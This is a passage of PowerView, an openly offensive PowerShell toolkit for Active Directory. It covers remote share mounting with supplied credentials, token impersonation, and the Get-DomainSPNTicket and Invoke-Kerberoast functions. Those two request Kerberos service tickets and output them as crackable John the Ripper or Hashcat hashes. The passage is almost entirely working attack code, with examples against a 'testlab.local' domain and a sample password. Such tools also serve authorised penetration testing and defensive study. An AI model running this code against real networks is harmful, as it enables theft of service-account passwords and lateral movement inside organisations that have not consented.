credential object, allowing for access of remote resources. If a -Path isn't
specified, a -ComputerName is required to pseudo-mount IPC$.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: PSReflect
.DESCRIPTION
This function uses WNetAddConnection2W to make a 'temporary' (i.e. not saved) connection
to the specified remote -Path (\\UNC\share) with the alternate credentials specified in the
-Credential object. If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$.
To destroy the connection, use Remove-RemoteConnection with the same specified \\UNC\share path
or -ComputerName.
.PARAMETER ComputerName
Specifies the system to add a \\ComputerName\IPC$ connection for.
.PARAMETER Path
Specifies the remote \\UNC\path to add the connection for.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote system.
.EXAMPLE
$Cred = Get-Credential
Add-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Add-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\' -Credential $Cred
.EXAMPLE
$Cred = Get-Credential
@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection -Credential $Cred
#>
[CmdletBinding(DefaultParameterSetName = 'ComputerName')]
Param(
[Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName,
[Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)]
[ValidatePattern('\\\\.*\\.*')]
[String[]]
$Path,
[Parameter(Mandatory = $True)]
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential
)
BEGIN {
$NetResourceInstance = [Activator]::CreateInstance($NETRESOURCEW)
$NetResourceInstance.dwType = 1
}
PROCESS {
$Paths = @()
if ($PSBoundParameters['ComputerName']) {
ForEach ($TargetComputerName in $ComputerName) {
$TargetComputerName = $TargetComputerName.Trim('\')
$Paths += ,"\\$TargetComputerName\IPC$"
}
}
else {
$Paths += ,$Path
}
ForEach ($TargetPath in $Paths) {
$NetResourceInstance.lpRemoteName = $TargetPath
Write-Verbose "[Add-RemoteConnection] Attempting to mount: $TargetPath"
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa385413(v=vs.85).aspx
# CONNECT_TEMPORARY = 4
$Result = $Mpr::WNetAddConnection2W($NetResourceInstance, $Credential.GetNetworkCredential().Password, $Credential.UserName, 4)
if ($Result -eq 0) {
Write-Verbose "$TargetPath successfully mounted"
}
else {
Throw "[Add-RemoteConnection] error mounting $TargetPath : $(([ComponentModel.Win32Exception]$Result).Message)"
}
}
}
}
function Remove-RemoteConnection {
<#
.SYNOPSIS
Destroys a connection created by New-RemoteConnection.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: PSReflect
.DESCRIPTION
This function uses WNetCancelConnection2 to destroy a connection created by
New-RemoteConnection. If a -Path isn't specified, a -ComputerName is required to
'unmount' \\$ComputerName\IPC$.
.PARAMETER ComputerName
Specifies the system to remove a \\ComputerName\IPC$ connection for.
.PARAMETER Path
Specifies the remote \\UNC\path to remove the connection for.
.EXAMPLE
Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local'
.EXAMPLE
Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\'
.EXAMPLE
@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
[CmdletBinding(DefaultParameterSetName = 'ComputerName')]
Param(
[Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName,
[Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)]
[ValidatePattern('\\\\.*\\.*')]
[String[]]
$Path
)
PROCESS {
$Paths = @()
if ($PSBoundParameters['ComputerName']) {
ForEach ($TargetComputerName in $ComputerName) {
$TargetComputerName = $TargetComputerName.Trim('\')
$Paths += ,"\\$TargetComputerName\IPC$"
}
}
else {
$Paths += ,$Path
}
ForEach ($TargetPath in $Paths) {
Write-Verbose "[Remove-RemoteConnection] Attempting to unmount: $TargetPath"
$Result = $Mpr::WNetCancelConnection2($TargetPath, 0, $True)
if ($Result -eq 0) {
Write-Verbose "$TargetPath successfully ummounted"
}
else {
Throw "[Remove-RemoteConnection] error unmounting $TargetPath : $(([ComponentModel.Win32Exception]$Result).Message)"
}
}
}
}
function Invoke-UserImpersonation {
<#
.SYNOPSIS
Creates a new "runas /netonly" type logon and impersonates the token.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: PSReflect
.DESCRIPTION
This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType
to simulate "runas /netonly". The resulting token is then impersonated with
ImpersonateLoggedOnUser() and the token handle is returned for later usage
with Invoke-RevertToSelf.
.PARAMETER Credential
A [Management.Automation.PSCredential] object with alternate credentials
to impersonate in the current thread space.
.PARAMETER TokenHandle
An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation.
If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser()
is executed.
.PARAMETER Quiet
Suppress any warnings about STA vs MTA.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Invoke-UserImpersonation -Credential $Cred
.OUTPUTS
IntPtr
The TokenHandle result from LogonUser.
#>
[OutputType([IntPtr])]
[CmdletBinding(DefaultParameterSetName = 'Credential')]
Param(
[Parameter(Mandatory = $True, ParameterSetName = 'Credential')]
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential,
[Parameter(Mandatory = $True, ParameterSetName = 'TokenHandle')]
[ValidateNotNull()]
[IntPtr]
$TokenHandle,
[Switch]
$Quiet
)
if (([System.Threading.Thread]::CurrentThread.GetApartmentState() -ne 'STA') -and (-not $PSBoundParameters['Quiet'])) {
Write-Warning "[Invoke-UserImpersonation] powershell.exe is not currently in a single-threaded apartment state, token impersonation may not work."
}
if ($PSBoundParameters['TokenHandle']) {
$LogonTokenHandle = $TokenHandle
}
else {
$LogonTokenHandle = [IntPtr]::Zero
$NetworkCredential = $Credential.GetNetworkCredential()
$UserDomain = $NetworkCredential.Domain
$UserName = $NetworkCredential.UserName
Write-Warning "[Invoke-UserImpersonation] Executing LogonUser() with user: $($UserDomain)\$($UserName)"
# LOGON32_LOGON_NEW_CREDENTIALS = 9, LOGON32_PROVIDER_WINNT50 = 3
# this is to simulate "runas.exe /netonly" functionality
$Result = $Advapi32::LogonUser($UserName, $UserDomain, $NetworkCredential.Password, 9, 3, [ref]$LogonTokenHandle);$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error();
if (-not $Result) {
throw "[Invoke-UserImpersonation] LogonUser() Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
}
}
# actually impersonate the token from LogonUser()
$Result = $Advapi32::ImpersonateLoggedOnUser($LogonTokenHandle)
if (-not $Result) {
throw "[Invoke-UserImpersonation] ImpersonateLoggedOnUser() Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
}
Write-Verbose "[Invoke-UserImpersonation] Alternate credentials successfully impersonated"
$LogonTokenHandle
}
function Invoke-RevertToSelf {
<#
.SYNOPSIS
Reverts any token impersonation.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: PSReflect
.DESCRIPTION
This function uses RevertToSelf() to revert any impersonated tokens.
If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),
CloseHandle() is used to close the opened handle.
.PARAMETER TokenHandle
An optional IntPtr TokenHandle returned by Invoke-UserImpersonation.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
$Token = Invoke-UserImpersonation -Credential $Cred
Invoke-RevertToSelf -TokenHandle $Token
#>
[CmdletBinding()]
Param(
[ValidateNotNull()]
[IntPtr]
$TokenHandle
)
if ($PSBoundParameters['TokenHandle']) {
Write-Warning "[Invoke-RevertToSelf] Reverting token impersonation and closing LogonUser() token handle"
$Result = $Kernel32::CloseHandle($TokenHandle)
}
$Result = $Advapi32::RevertToSelf();$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error();
if (-not $Result) {
throw "[Invoke-RevertToSelf] RevertToSelf() Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
}
Write-Verbose "[Invoke-RevertToSelf] Token impersonation successfully reverted"
}
function Get-DomainSPNTicket {
<#
.SYNOPSIS
Request the kerberos ticket for a specified service principal name (SPN).
Author: machosec, Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf
.DESCRIPTION
This function will either take one/more SPN strings, or one/more PowerView.User objects
(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN
using System.IdentityModel.Tokens.KerberosRequestorSecurityToken. The encrypted
portion of the ticket is then extracted and output in either crackable John or Hashcat
format (deafult of John).
.PARAMETER SPN
Specifies the service principal name to request the ticket for.
.PARAMETER User
Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for.
.PARAMETER OutputFormat
Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
Defaults to 'John'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote domain using Invoke-UserImpersonation.
.EXAMPLE
Get-DomainSPNTicket -SPN "HTTP/web.testlab.local"
Request a kerberos service ticket for the specified SPN.
.EXAMPLE
"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket
Request kerberos service tickets for all SPNs passed on the pipeline.
.EXAMPLE
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format.
.INPUTS
String
Accepts one or more SPN strings on the pipeline with the RawSPN parameter set.
.INPUTS
PowerView.User
Accepts one or more PowerView.User objects on the pipeline with the User parameter set.
.OUTPUTS
PowerView.SPNTicket
Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
#>
[OutputType('PowerView.SPNTicket')]
[CmdletBinding(DefaultParameterSetName = 'RawSPN')]
Param (
[Parameter(Position = 0, ParameterSetName = 'RawSPN', Mandatory = $True, ValueFromPipeline = $True)]
[ValidatePattern('.*/.*')]
[Alias('ServicePrincipalName')]
[String[]]
$SPN,
[Parameter(Position = 0, ParameterSetName = 'User', Mandatory = $True, ValueFromPipeline = $True)]
[ValidateScript({ $_.PSObject.TypeNames[0] -eq 'PowerView.User' })]
[Object[]]
$User,
[ValidateSet('John', 'Hashcat')]
[Alias('Format')]
[String]
$OutputFormat = 'John',
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')
if ($PSBoundParameters['Credential']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
}
PROCESS {
if ($PSBoundParameters['User']) {
$TargetObject = $User
}
else {
$TargetObject = $SPN
}
ForEach ($Object in $TargetObject) {
if ($PSBoundParameters['User']) {
$UserSPN = $Object.ServicePrincipalName
$SamAccountName = $Object.SamAccountName
$DistinguishedName = $Object.DistinguishedName
}
else {
$UserSPN = $Object
$SamAccountName = 'UNKNOWN'
$DistinguishedName = 'UNKNOWN'
}
# if a user has multiple SPNs we only take the first one otherwise the service ticket request fails miserably :) -@st3r30byt3
if ($UserSPN -is [System.DirectoryServices.ResultPropertyValueCollection]) {
$UserSPN = $UserSPN[0]
}
try {
$Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN
}
catch {
Write-Warning "[Get-DomainSPNTicket] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName' : $_"
}
if ($Ticket) {
$TicketByteStream = $Ticket.GetRequest()
}
if ($TicketByteStream) {
$TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace '-'
[System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split 'A48201'
$Parts.RemoveAt($Parts.Count - 1)
$Hash = $Parts -join 'A48201'
$Hash = $Hash.Insert(32, '$')
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'SamAccountName' $SamAccountName
$Out | Add-Member Noteproperty 'DistinguishedName' $DistinguishedName
$Out | Add-Member Noteproperty 'ServicePrincipalName' $Ticket.ServicePrincipalName
if ($OutputFormat -match 'John') {
$HashFormat = "`$krb5tgs`$$($Ticket.ServicePrincipalName):$Hash"
}
else {
if ($DistinguishedName -ne 'UNKNOWN') {
$UserDomain = $DistinguishedName.SubString($DistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
}
else {
$UserDomain = 'UNKNOWN'
}
# hashcat output format
$HashFormat = "`$krb5tgs`$23`$*$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)*`$$Hash"
}
$Out | Add-Member Noteproperty 'Hash' $HashFormat
$Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket')
Write-Output $Out
}
}
}
END {
if ($LogonToken) {
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
function Invoke-Kerberoast {
<#
.SYNOPSIS
Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes.
Author: Will Schroeder (@harmj0y), @machosec
License: BSD 3-Clause
Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket
.DESCRIPTION
Uses Get-DomainUser to query for user accounts with non-null service principle
names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information.
The ticket format can be specified with -OutputFormat <John/Hashcat>.
.PARAMETER Identity
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
Wildcards accepted.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER OutputFormat
Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
Defaults to 'John'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Invoke-Kerberoast | fl
Kerberoasts all found SPNs for the current domain.
.EXAMPLE
Invoke-Kerberoast -Domain dev.testlab.local -OutputFormat HashCat | fl
Kerberoasts all found SPNs for the testlab.local domain, outputting to HashCat
format instead of John (the default).
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce
$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\dfm.a', $SecPassword)
Invoke-Kerberoast -Credential $Cred -Verbose -Domain testlab.local | fl
Kerberoasts all found SPNs for the testlab.local domain using alternate credentials.
.OUTPUTS
PowerView.SPNTicket
Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.SPNTicket')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
[String[]]
$Identity,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[ValidateSet('John', 'Hashcat')]
[Alias('Format')]
[String]
$OutputFormat = 'John',
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$UserSearcherArguments = @{
'SPN' = $True
'Properties' = 'samaccountname,distinguishedname,serviceprincipalname'
}
if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['LDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $LDAPFilter }
if ($PSBoundParameters['SearchBase']) { $UserSearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }
if ($PSBoundParameters['Credential']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
}
PROCESS {
if ($PSBoundParameters['Identity']) { $UserSearcherArguments['Identity'] = $Identity }
Get-DomainUser @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | Get-DomainSPNTicket -OutputFormat $OutputFormat
}
END {
if ($LogonToken) {
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
function Get-PathAcl {
<#
.SYNOPSIS
Enumerates the ACL for a given file path.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID
.DESCRIPTION
Enumerates the ACL for a specified file/folder path, and translates
the access rules for each entry into readable formats. If -Credential is passed,
Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share.
.PARAMETER Path
Specifies the local or remote path to enumerate the ACLs for.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target path.
.EXAMPLE
Get-PathAcl "\\SERVER\Share\"
Returns ACLs for the given UNC share.
.EXAMPLE
gci .\test.txt | Get-PathAcl
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
Get-PathAcl -Path "\\SERVER\Share\" -Credential $Cred
.INPUTS
String
One of more paths to enumerate ACLs for.
.OUTPUTS
PowerView.FileACL
A custom object with the full path and associated ACL entries.
.LINK
https://support.microsoft.com/en-us/kb/305144
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.FileACL')]
[CmdletBinding()]
Param(
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('FullName')]
[String[]]
$Path,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
function Convert-FileRight {
# From Ansgar Wiechers at http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights
[CmdletBinding()]
Param(
[Int]
$FSR
)
$AccessMask = @{
[uint32]'0x80000000' = 'GenericRead'
[uint32]'0x40000000' = 'GenericWrite'
[uint32]'0x20000000' = 'GenericExecute'
[uint32]'0x10000000' = 'GenericAll'
[uint32]'0x02000000' = 'MaximumAllowed'
[uint32]'0x01000000' = 'AccessSystemSecurity'
[uint32]'0x00100000' = 'Synchronize'
[uint32]'0x00080000' = 'WriteOwner'
[uint32]'0x00040000' = 'WriteDAC'
[uint32]'0x00020000' = 'ReadControl'
[uint32]'0x00010000' = 'Delete'
[uint32]'0x00000100' = 'WriteAttributes'
[uint32]'0x00000080' = 'ReadAttributes'
[uint32]'0x00000040' = 'DeleteChild'
[uint32]'0x00000020' = 'Execute/Traverse'
[uint32]'0x00000010' = 'WriteExtendedAttributes'
[uint32]'0x00000008' = 'ReadExtendedAttributes'
[uint32]'0x00000004' = 'AppendData/AddSubdirectory'
[uint32]'0x00000002' = 'WriteData/AddFile'
[uint32]'0x00000001' = 'ReadData/ListDirectory'
}
$SimplePermissions = @{
[uint32]'0x1f01ff' = 'FullControl'
[uint32]'0x0301bf' = 'Modify'
[uint32]'0x0200a9' = 'ReadAndExecute'
[uint32]'0x02019f' = 'ReadAndWrite'
[uint32]'0x020089' = 'Read'
[uint32]'0x000116' = 'Write'
}
$Permissions = @()
# get simple permission
$Permissions += $SimplePermissions.Keys | ForEach-Object {
if (($FSR -band $_) -eq $_) {
$SimplePermissions[$_]
$FSR = $FSR -band (-not $_)
}
}
# get remaining extended permissions
$Permissions += $AccessMask.Keys | Where-Object { $FSR -band $_ } | ForEach-Object { $AccessMask[$_] }
($Permissions | Where-Object {$_}) -join ','
}
$ConvertArguments = @{}
if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential }
$MappedComputers = @{}
}
PROCESS {
ForEach ($TargetPath in $Path) {
try {
if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
$HostComputer = (New-Object System.Uri($TargetPath)).Host
if (-not $MappedComputers[$HostComputer]) {
# map IPC$ to this computer if it's not already
Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential
$MappedComputers[$HostComputer] = $True
}
}
$ACL = Get-Acl -Path $TargetPath
$ACL.GetAccessRules($True, $True, [System.Security.Principal.SecurityIdentifier]) | ForEach-Object {
$SID = $_.IdentityReference.Value
$Name = ConvertFrom-SID -ObjectSID $SID @ConvertArguments
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'Path' $TargetPath
$Out | Add-Member Noteproperty 'FileSystemRights' (Convert-FileRight -FSR $_.FileSystemRights.value__)
$Out | Add-Member Noteproperty 'IdentityReference' $Name
$Out | Add-Member Noteproperty 'IdentitySID' $SID
$Out | Add-Member Noteproperty 'AccessControlType' $_.AccessControlType
$Out.PSObject.TypeNames.Insert(0, 'PowerView.FileACL')
$Out
}
}
catch {
Write-Verbose "[Get-PathAcl] error: $_"
}
}
}
END {
# remove the IPC$ mappings
$MappedComputers.Keys | Remove-RemoteConnection
}
}
function Convert-LDAPProperty {
<#
.SYNOPSIS
Helper that converts specific LDAP property result fields and outputs
a custom psobject.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
.DESCRIPTION
Converts a set of raw LDAP properties results from ADSI/LDAP searches
into a proper PSObject. Used by several of the Get-Domain* function.
.PARAMETER Properties
Properties object to extract out LDAP fields for display.
.OUTPUTS
System.Management.Automation.PSCustomObject
A custom PSObject with LDAP hashtable properties translated.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('System.Management.Automation.PSCustomObject')]
[CmdletBinding()]
Param(
[Parameter(Mandatory = $True, ValueFromPipeline = $True)]
[ValidateNotNullOrEmpty()]
$Properties
)
$ObjectProperties = @{}
$Properties.PropertyNames | ForEach-Object {
if ($_ -ne 'adspath') {
if (($_ -eq 'objectsid') -or ($_ -eq 'sidhistory')) {
# convert all listed sids (i.e. if multiple are listed in sidHistory)
$ObjectProperties[$_] = $Properties[$_] | ForEach-Object { (New-Object System.Security.Principal.SecurityIdentifier($_, 0)).Value }
}
elseif ($_ -eq 'grouptype') {
$ObjectProperties[$_] = $Properties[$_][0] -as $GroupTypeEnum
}
elseif ($_ -eq 'samaccounttype') {
$ObjectProperties[$_] = $Properties[$_][0] -as $SamAccountTypeEnum
}
elseif ($_ -eq 'objectguid') {
# convert the GUID to a string
$ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid
}
elseif ($_ -eq 'useraccountcontrol') {
$ObjectProperties[$_] = $Properties[$_][0] -as $UACEnum
}
elseif ($_ -eq 'ntsecuritydescriptor') {
# $ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0
if ($Descriptor.Owner) {
$ObjectProperties['Owner'] = $Descriptor.Owner
}
if ($Descriptor.Group) {
$ObjectProperties['Group'] = $Descriptor.Group
}
if ($Descriptor.DiscretionaryAcl) {
$ObjectProperties['DiscretionaryAcl'] = $Descriptor.DiscretionaryAcl
}
if ($Descriptor.SystemAcl) {
$ObjectProperties['SystemAcl'] = $Descriptor.SystemAcl
}
}
elseif ($_ -eq 'accountexpires') {
if ($Properties[$_][0] -gt [DateTime]::MaxValue.Ticks) {
$ObjectProperties[$_] = "NEVER"
}
else {
$ObjectProperties[$_] = [datetime]::fromfiletime($Properties[$_][0])
}
}
elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime') ) {
# convert timestamps
if ($Properties[$_][0] -is [System.MarshalByRefObject]) {
# if we have a System.__ComObject
$Temp = $Properties[$_][0]
[Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
[Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
$ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low)))
}
else {
# otherwise just a string
$ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0])))
}
}
elseif ($Properties[$_][0] -is [System.MarshalByRefObject]) {
# try to convert misc com objects
$Prop = $Properties[$_]
try {
$Temp = $Prop[$_][0]
[Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
[Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
$ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low)
}
catch {
Write-Verbose "[Convert-LDAPProperty] error: $_"
$ObjectProperties[$_] = $Prop[$_]
}
}
elseif ($Properties[$_].count -eq 1) {
$ObjectProperties[$_] = $Properties[$_][0]
}
else {
$ObjectProperties[$_] = $Properties[$_]
}
}
}
try {
New-Object -TypeName PSObject -Property $ObjectProperties
}
catch {
Write-Warning "[Convert-LDAPProperty] Error parsing LDAP properties : $_"
}
}
########################################################
#
# Domain info functions below.
#
########################################################
function Get-DomainSearcher {
<#
.SYNOPSIS
Helper used by various functions that builds a custom AD searcher object.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-Domain
.DESCRIPTION
Takes a given domain and a number of customizations and returns a
System.DirectoryServices.DirectorySearcher object. This function is used
heavily by other LDAP/ADSI searcher functions (Verb-Domain*).
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER SearchBasePrefix
Specifies a prefix for the LDAP search string (i.e. "CN=Sites,CN=Configuration").
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to for the search.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER SecurityMasks
Specifies an option for examining security information of a directory object.
One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainSearcher -Domain testlab.local
Return a searcher for all objects in testlab.local.
.EXAMPLE
Get-DomainSearcher -Domain testlab.local -LDAPFilter '(samAccountType=805306368)' -Properties 'SamAccountName,lastlogon'
Return a searcher for user objects in testlab.local and only return the SamAccountName and LastLogon properties.
.EXAMPLE
Get-DomainSearcher -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
Return a searcher that searches through the specific ADS/LDAP search base (i.e. OU).
.OUTPUTS
System.DirectoryServices.DirectorySearcher
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
